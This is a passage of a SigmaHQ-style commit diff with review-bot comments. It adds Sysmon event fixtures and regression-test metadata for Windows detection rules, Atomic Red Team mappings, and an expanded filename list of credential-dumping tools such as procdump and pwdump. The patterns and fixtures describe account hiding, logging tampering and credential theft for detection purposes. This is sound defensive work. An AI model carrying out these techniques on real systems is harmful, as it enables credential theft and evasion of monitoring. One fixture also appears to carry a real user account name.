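Review bot: `"Computer": "srv-01.midgardnet.tech"` and `"User": "MIDGARDNET\\SwachchhandaP"` break with every other fixture in this series, which use `ar-win-dc.attackrange.local` and `ATTACKRANGE\\Administrator`, and the user value reads like a real person's workstation account rather than a lab principal. Test data committed to a public repository should not carry identifiable hostnames or user names; since the .evtx is presumably the authoritative input, the clean fix is to re-record this event in the lab environment the other fixtures came from, and failing that to state the provenance in the fixture's info.yml. Keeping the host and principal consistent across fixtures also keeps any host-keyed allow-listing in the test tooling predictable.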
@@ -0,0 +1,13 @@ +id: a6c567e7-d5d4-494b-9a66-71fa87c44f8e +description: N/A +date: 2025-10-31 +author: SigmaHQ Team +rule_metadata: + - id: fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7 + title: PowerShell Logging Disabled Via Registry Key Tampering +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_powershell_logging_disabled/fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/25ffa65d-76d8-4da5-a832-3f2b0136e133.evtx b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/25ffa65d-76d8-4da5-a832-3f2b0136e133.evtx new file mode 100644 index 000000000..98ed7ce3a Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/25ffa65d-76d8-4da5-a832-3f2b0136e133.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/25ffa65d-76d8-4da5-a832-3f2b0136e133.json b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/25ffa65d-76d8-4da5-a832-3f2b0136e133.json new file mode 100644 index 000000000..57a822e98 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/25ffa65d-76d8-4da5-a832-3f2b0136e133.json 
@@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T23:59:35.308812Z" + } + }, + "EventRecordID": 16567695, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-25 23:59:35.300", + "ProcessGuid": "5AA13A44-6465-68FD-EF3E-000000004002", + "ProcessId": 7500, + "Image": "C:\\Users\\Administrator\\Downloads\\PsService.exe", + "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Software\\Sysinternals\\PsService\\EulaAccepted", + "Details": "DWORD (0x00000001)", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/info.yml b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/info.yml new file mode 100644 index 000000000..2584ad3ad --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/info.yml 
@@ -0,0 +1,13 @@ +id: 070ba0e3-b1e5-4fa9-9935-ca8a8c233b3d +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 + title: PUA - Sysinternal Tool Execution - Registry +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/25ffa65d-76d8-4da5-a832-3f2b0136e133.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/f50f3c09-557d-492d-81db-9064a8d4e211.evtx b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/f50f3c09-557d-492d-81db-9064a8d4e211.evtx new file mode 100644 index 000000000..f6af04c14 Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/f50f3c09-557d-492d-81db-9064a8d4e211.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/f50f3c09-557d-492d-81db-9064a8d4e211.json b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/f50f3c09-557d-492d-81db-9064a8d4e211.json new file mode 100644 index 000000000..d5ae043b3 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/f50f3c09-557d-492d-81db-9064a8d4e211.json 
@@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T00:00:51.970813Z" + } + }, + "EventRecordID": 16592206, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-26 00:00:51.957", + "ProcessGuid": "5AA13A44-64B2-68FD-FB3E-000000004002", + "ProcessId": 4776, + "Image": "C:\\Users\\Administrator\\Downloads\\FakeSysinternals.exe", + "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Software\\Sysinternals\\PsService\\EulaAccepted", + "Details": "DWORD (0x00000001)", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/info.yml b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/info.yml new file mode 100644 index 000000000..42e79ede0 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/info.yml 
@@ -0,0 +1,13 @@ +id: a977324d-5006-46e6-bb1c-9d8b13344f00 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: f50f3c09-557d-492d-81db-9064a8d4e211 + title: Suspicious Execution Of Renamed Sysinternals Tools - Registry +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/f50f3c09-557d-492d-81db-9064a8d4e211.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/c7da8edc-49ae-45a2-9e61-9fd860e4e73d.evtx b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/c7da8edc-49ae-45a2-9e61-9fd860e4e73d.evtx new file mode 100644 index 000000000..a0246bec5 Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/c7da8edc-49ae-45a2-9e61-9fd860e4e73d.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/c7da8edc-49ae-45a2-9e61-9fd860e4e73d.json b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/c7da8edc-49ae-45a2-9e61-9fd860e4e73d.json new file mode 100644 index 000000000..57a822e98 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/c7da8edc-49ae-45a2-9e61-9fd860e4e73d.json 
@@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T23:59:35.308812Z" + } + }, + "EventRecordID": 16567695, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-25 23:59:35.300", + "ProcessGuid": "5AA13A44-6465-68FD-EF3E-000000004002", + "ProcessId": 7500, + "Image": "C:\\Users\\Administrator\\Downloads\\PsService.exe", + "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Software\\Sysinternals\\PsService\\EulaAccepted", + "Details": "DWORD (0x00000001)", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/info.yml b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/info.yml new file mode 100644 index 000000000..cecb899ec --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/info.yml 
@@ -0,0 +1,13 @@ +id: 55e4036d-e026-4110-bf9a-a1037f28edbb +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: c7da8edc-49ae-45a2-9e61-9fd860e4e73d + title: PUA - Sysinternals Tools Execution - Registry +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/c7da8edc-49ae-45a2-9e61-9fd860e4e73d.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_special_accounts/f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.evtx b/regression_data/windows/registry/registry_set/registry_set_special_accounts/f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.evtx new file mode 100644 index 000000000..9e64486b1 Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_special_accounts/f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_special_accounts/f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.json b/regression_data/windows/registry/registry_set/registry_set_special_accounts/f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.json new file mode 100644 index 000000000..d5227b3e4 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_special_accounts/f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.json 
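Review bot: The positive fixture registered here for rule c7da8edc is the same event already used for rule 25ffa65d — both JSON blobs carry `EventRecordID` 16567695, `ProcessGuid` `5AA13A44-6465-68FD-EF3E-000000004002` and the same blob hash `57a822e98` in their `index` lines — so `match_count: 1` only proves the two rules overlap, not what distinguishes them. If c7da8edc is meant to be the narrower variant (the directory name `registry_set_pua_sysinternals_susp_execution_via_eula` suggests a suspicious-path condition), add a second entry with an event that should not fire, e.g. the same `EulaAccepted` write from an `Image` under `C:\Program Files\`, with `match_count: 0`, assuming the runner accepts a zero count. A one-line `description:` naming which condition of the rule the fixture is meant to hit would also replace the `N/A`.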
@@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-31T05:06:45.377630Z" + } + }, + "EventRecordID": 657154, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3080, + "ThreadID": 4948 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "srv-01.midgardnet.tech", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-31 05:06:45.377", + "ProcessGuid": "14207D89-43E5-6904-4506-000000004002", + "ProcessId": 5244, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\\AtomicOperator$", + "Details": "DWORD (0x00000000)", + "User": "MIDGARDNET\\SwachchhandaP" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_special_accounts/info.yml b/regression_data/windows/registry/registry_set/registry_set_special_accounts/info.yml new file mode 100644 index 000000000..4c358cfdf --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_special_accounts/info.yml 
@@ -0,0 +1,13 @@ +id: 3c14b160-a7f5-49a4-beb2-575b70f599b9 +description: N/A +date: 2025-10-31 +author: SigmaHQ Team +rule_metadata: + - id: f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd + title: Hiding User Account Via SpecialAccounts Registry Key +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_special_accounts/f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.evtx diff --git a/regression_data/windows/sysmon/sysmon_config_modification/8ac03a65-6c84-4116-acad-dc1558ff7a77.evtx b/regression_data/windows/sysmon/sysmon_config_modification/8ac03a65-6c84-4116-acad-dc1558ff7a77.evtx new file mode 100644 index 000000000..795232370 Binary files /dev/null and b/regression_data/windows/sysmon/sysmon_config_modification/8ac03a65-6c84-4116-acad-dc1558ff7a77.evtx differ diff --git a/regression_data/windows/sysmon/sysmon_config_modification/8ac03a65-6c84-4116-acad-dc1558ff7a77.json b/regression_data/windows/sysmon/sysmon_config_modification/8ac03a65-6c84-4116-acad-dc1558ff7a77.json new file mode 100644 index 000000000..086ffa666 --- /dev/null +++ b/regression_data/windows/sysmon/sysmon_config_modification/8ac03a65-6c84-4116-acad-dc1558ff7a77.json 
@@ -0,0 +1,46 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 16, + "Version": 3, + "Level": 4, + "Task": 16, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:33:08.092105Z" + } + }, + "EventRecordID": 11738, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 8932, + "ThreadID": 1540 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-21-3960063115-309473240-3247002503-500" + } + } + }, + "EventData": { + "UtcTime": "2025-10-24 23:33:08.088", + "Configuration": "C:\\Users\\Administrator\\Downloads\\sysmonconfig-trace.xml", + "ConfigurationFileHash": "SHA256=B977839264146AFDE215D41182F78F153F9198EBA8EF0B88426239C33FBDA945" + } + } +} diff --git a/regression_data/windows/sysmon/sysmon_config_modification/info.yml b/regression_data/windows/sysmon/sysmon_config_modification/info.yml new file mode 100644 index 000000000..dff42a8a1 --- /dev/null +++ b/regression_data/windows/sysmon/sysmon_config_modification/info.yml @@ -0,0 +1,13 @@ +id: 54f3ccdd-e1f9-4b9f-8dda-b1bdcb13d6ba +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 8ac03a65-6c84-4116-acad-dc1558ff7a77 + title: Sysmon Configuration Change +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/sysmon/sysmon_config_modification/8ac03a65-6c84-4116-acad-dc1558ff7a77.evtx diff --git a/rules/linux/auditd/lnx_auditd_binary_padding.yml b/rules/linux/auditd/lnx_auditd_binary_padding.yml index a625c7423..b8309f04f 100644 --- a/rules/linux/auditd/lnx_auditd_binary_padding.yml 
+++ b/rules/linux/auditd/lnx_auditd_binary_padding.yml @@ -32,3 +32,8 @@ detection: falsepositives: - Unknown level: high +simulation: + - type: atomic-red-team + name: Pad Binary to Change Hash - Linux/macOS dd + technique: T1027.001 + atomic_guid: ffe2346c-abd5-4b45-a713-bf5f1ebd573a diff --git a/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml b/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml index 48fdc5bd0..6cfcea06b 100644 --- a/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml +++ b/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml @@ -27,3 +27,16 @@ detection: falsepositives: - Unknown level: medium +simulation: + - type: atomic-red-team + name: Set a file's access timestamp + technique: T1070.006 + atomic_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810 + - type: atomic-red-team + name: Set a file's modification timestamp + technique: T1070.006 + atomic_guid: 20ef1523-8758-4898-b5a2-d026cc3d2c52 + - type: atomic-red-team + name: Modify file timestamps using reference file + technique: T1070.006 + atomic_guid: 631ea661-d661-44b0-abdb-7a7f3fc08e50 diff --git a/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml b/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml index 5121bf17c..4ca7d8d20 100644 --- a/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml +++ b/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml @@ -22,3 +22,8 @@ detection: falsepositives: - Administrator interacting with immutable files (e.g. for instance backups). level: medium +simulation: + - type: atomic-red-team + name: Remove immutable file attribute + technique: T1222.002 + atomic_guid: e7469fe2-ad41-4382-8965-99b94dd3c13f diff --git a/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml b/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml index 44ee10449..70b52513f 100644 --- a/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml 
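Review bot: The new top-level `simulation:` key is not one of the attributes the Sigma rule format defines, so if the repository's rule-schema tests or `sigma check` enforce a fixed key set they will reject every rule touched by this commit; make sure the key is either declared in the project's schema or explicitly accepted as a custom attribute before merging. The `atomic_guid` values also point at Atomic Red Team tests without recording which ART revision they were taken from, and atomics do get renamed or removed upstream, so a short comment such as `# atomic_guid values verified against atomic-red-team as of 2025-10` next to the first `simulation:` entry would tell a reader when the mapping was last checked. The same applies to the `change_file_time_attr` and `chattr_immutable_removal` hunks that follow on this line.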
+++ b/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml @@ -27,3 +27,4 @@ detection: falsepositives: - Legitimate administrative use level: medium +regression_tests_path: regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/info.yml diff --git a/rules/windows/file/file_event/file_event_win_anydesk_artefact.yml b/rules/windows/file/file_event/file_event_win_anydesk_artefact.yml index 8739223b2..a33b96e48 100644 --- a/rules/windows/file/file_event/file_event_win_anydesk_artefact.yml +++ b/rules/windows/file/file_event/file_event_win_anydesk_artefact.yml @@ -25,3 +25,4 @@ detection: falsepositives: - Legitimate use level: medium +regression_tests_path: regression_data/windows/file/file_event/file_event_win_anydesk_artefact/info.yml diff --git a/rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations.yml b/rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations.yml index 41f7ade4b..3ac06816d 100644 --- a/rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations.yml +++ b/rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations.yml @@ -30,3 +30,4 @@ falsepositives: - Administrator or backup activity - An unknown bug seems to trigger the Windows "svchost" process to drop EVTX files in the "C:\Windows\Temp" directory in the form "_.evtx". See https://superuser.com/questions/1371229/low-disk-space-after-filling-up-c-windows-temp-with-evtx-and-txt-files level: medium +regression_tests_path: regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/info.yml diff --git a/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml b/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml index a4c058951..cc937adea 100644 --- a/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml +++ b/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml 
@@ -39,3 +39,4 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/info.yml diff --git a/rules/windows/file/file_event/file_event_win_creation_new_shim_database.yml b/rules/windows/file/file_event/file_event_win_creation_new_shim_database.yml index 850807c43..15e6595ef 100644 --- a/rules/windows/file/file_event/file_event_win_creation_new_shim_database.yml +++ b/rules/windows/file/file_event/file_event_win_creation_new_shim_database.yml @@ -28,3 +28,4 @@ detection: falsepositives: - Legitimate custom SHIM installations will also trigger this rule level: medium +regression_tests_path: regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/info.yml diff --git a/rules/windows/file/file_event/file_event_win_creation_system_dll_files.yml b/rules/windows/file/file_event/file_event_win_creation_system_dll_files.yml index 709ce4341..dcde35a29 100644 --- a/rules/windows/file/file_event/file_event_win_creation_system_dll_files.yml +++ b/rules/windows/file/file_event/file_event_win_creation_system_dll_files.yml @@ -36,3 +36,4 @@ falsepositives: - Third party software might bundle specific versions of system DLLs. # Note: Upgrade to high after an initial baseline to your environement. level: medium +regression_tests_path: regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/info.yml diff --git a/rules/windows/file/file_event/file_event_win_creation_system_file.yml b/rules/windows/file/file_event/file_event_win_creation_system_file.yml index de270f6ed..f2491a751 100644 --- a/rules/windows/file/file_event/file_event_win_creation_system_file.yml +++ b/rules/windows/file/file_event/file_event_win_creation_system_file.yml 
@@ -135,3 +135,4 @@ falsepositives: - Third party software naming their software with the same names as the processes mentioned here # Note: Upgrade to high after an initial baseline to your environement. level: medium +regression_tests_path: regression_data/windows/file/file_event/file_event_win_creation_system_file/info.yml diff --git a/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml b/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml index 8be4b7133..ba80d2b3b 100755 --- a/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml +++ b/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml @@ -6,7 +6,7 @@ references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment author: Teymur Kheirkhabarov, oscd.community date: 2019-11-01 -modified: 2022-09-21 +modified: 2025-10-25 tags: - attack.credential-access - attack.t1003.001 @@ -36,7 +36,9 @@ detection: - '\lsremora.dll' - '\lsremora64.dll' - '\NTDS.out' + - '\procdump.exe' - '\procdump64.exe' + - '\procdump64a.exe' - '\pstgdump.exe' - '\pwdump.exe' - '\SAM.out' @@ -50,3 +52,4 @@ detection: falsepositives: - Legitimate Administrator using tool for password recovery level: high +regression_tests_path: regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/info.yml diff --git a/rules/windows/file/file_event/file_event_win_dump_file_susp_creation.yml b/rules/windows/file/file_event/file_event_win_dump_file_susp_creation.yml index c445dd4e7..4cf6a2769 100644 --- a/rules/windows/file/file_event/file_event_win_dump_file_susp_creation.yml +++ b/rules/windows/file/file_event/file_event_win_dump_file_susp_creation.yml 
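Review bot: Adding `\procdump.exe` and `\procdump64a.exe` to the filename list in the `@@ -36,7 +36,9 @@` hunk makes this `level: high` credential-access rule fire on every copy of the stock Sysinternals ProcDump being written to disk — browser downloads of the Sysinternals Suite, package-manager installs and software-distribution tooling all do that — while the only `falsepositives` entry still reads `Legitimate Administrator using tool for password recovery`. ProcDump has many legitimate non-credential uses (hang and crash dumps of arbitrary processes), so either add an entry such as `- Sysinternals Suite / ProcDump deployments by administrators or software distribution tooling` and state that consumers are expected to tune on the writing process, or keep the generic ProcDump names out of a high-severity dropped-files rule and leave them to rules that can look at the command line. The field selector for this list (presumably `TargetFilename|endswith`) and any `Image` filter sit above the hunk, so I cannot see whether the rule already narrows on the writing process.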
@@ -31,3 +31,4 @@ detection: falsepositives: - Some administrative PowerShell or VB scripts might have the ability to collect dumps and move them to other folders which might trigger a false positive. level: medium +regression_tests_path: regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/info.yml diff --git a/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml b/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml index 7762eb876..17ac9eefa 100644 --- a/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml +++ b/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml @@ -55,3 +55,4 @@ detection: falsepositives: - Some tuning is required for other general purpose directories of third party apps level: medium +regression_tests_path: regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/info.yml diff --git a/rules/windows/file/file_event/file_event_win_susp_public_folder_extension.yml b/rules/windows/file/file_event/file_event_win_susp_public_folder_extension.yml index 826214e9b..a88121ed0 100644 --- a/rules/windows/file/file_event/file_event_win_susp_public_folder_extension.yml +++ b/rules/windows/file/file_event/file_event_win_susp_public_folder_extension.yml @@ -30,3 +30,4 @@ detection: falsepositives: - Administrators deploying legitimate binaries to public folders. level: high +regression_tests_path: regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/info.yml diff --git a/rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec.yml b/rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec.yml index 0a7680262..df8f87366 100644 --- a/rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec.yml +++ b/rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec.yml 
@@ -31,3 +31,4 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/info.yml diff --git a/rules/windows/file/file_event/file_event_win_taskmgr_lsass_dump.yml b/rules/windows/file/file_event/file_event_win_taskmgr_lsass_dump.yml index 968797ea8..063cbb8e3 100644 --- a/rules/windows/file/file_event/file_event_win_taskmgr_lsass_dump.yml +++ b/rules/windows/file/file_event/file_event_win_taskmgr_lsass_dump.yml @@ -25,3 +25,4 @@ detection: falsepositives: - Rare case of troubleshooting by an administrator or support that has to be investigated regardless level: high +regression_tests_path: regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_at_interactive_execution.yml b/rules/windows/process_creation/proc_creation_win_at_interactive_execution.yml index c0386597b..7604bede6 100644 --- a/rules/windows/process_creation/proc_creation_win_at_interactive_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_at_interactive_execution.yml @@ -24,3 +24,8 @@ detection: falsepositives: - Unlikely (at.exe deprecated as of Windows 8) level: high +simulation: + - type: atomic-red-team + name: At.exe Scheduled task + technique: T1053.002 + atomic_guid: 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 diff --git a/rules/windows/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml b/rules/windows/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml index 30361b857..b11ec8ab6 100644 --- a/rules/windows/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml +++ b/rules/windows/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml 
@@ -31,3 +31,8 @@ detection: falsepositives: - Unlikely level: high +simulation: + - type: atomic-red-team + name: Windows - Disable Windows Recovery Console Repair + technique: T1490 + atomic_guid: cf21060a-80b3-4238-a595-22525de4ab81 diff --git a/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml b/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml index fe39b2885..4b132caf8 100644 --- a/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml +++ b/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml @@ -57,3 +57,4 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension.yml b/rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension.yml index bdc8f54c0..63894ef0e 100644 --- a/rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension.yml +++ b/rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension.yml @@ -31,3 +31,4 @@ detection: falsepositives: - Usage of Chrome Extensions in testing tools such as BurpSuite will trigger this alert level: medium +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml b/rules/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml index 9502bfcf2..4691d9645 100644 